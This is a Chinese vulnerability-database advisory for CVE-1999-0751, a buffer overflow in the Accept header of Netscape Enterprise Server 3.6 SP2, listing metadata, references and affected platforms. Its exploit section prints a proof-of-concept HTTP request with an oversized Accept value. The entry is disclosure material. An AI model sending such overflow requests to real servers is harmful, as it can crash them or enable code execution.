Netscape企业版Accept缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105540 漏洞类型 缓冲区溢出
发布时间 1999-09-13 更新时间 2007-07-16
CVE编号 CVE-1999-0751 CNNVD-ID CNNVD-199909-024
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19493
https://www.securityfocus.com/bid/631
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-024
|漏洞详情
带有SSLHandshake补丁的Netscape企业版服务器3.6版本Accept命令存在漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/631/info

Enterprise Server 3.6 SP2 with the SSL Handshake Patch applied is vulnerable to a buffer overflow that may allow attackers to launch denial-of-service attacks and to execute arbitrary commands on the webserver. 

GET / HTTP/1.0
Accept: aaaaaaaaaaaaaa...2000byte/gif
|受影响的产品
Netscape Enterprise Server 3.51 - Digital UNIX 4.0 D - HP HP-UX 10.10 - IBM AIX 4.1.5
|参考资料

来源:XF
名称:netscape-accept-bo(3256)
链接:http://xforce.iss.net/xforce/xfdb/3256
来源:BID
名称:631
链接:http://www.securityfocus.com/bid/631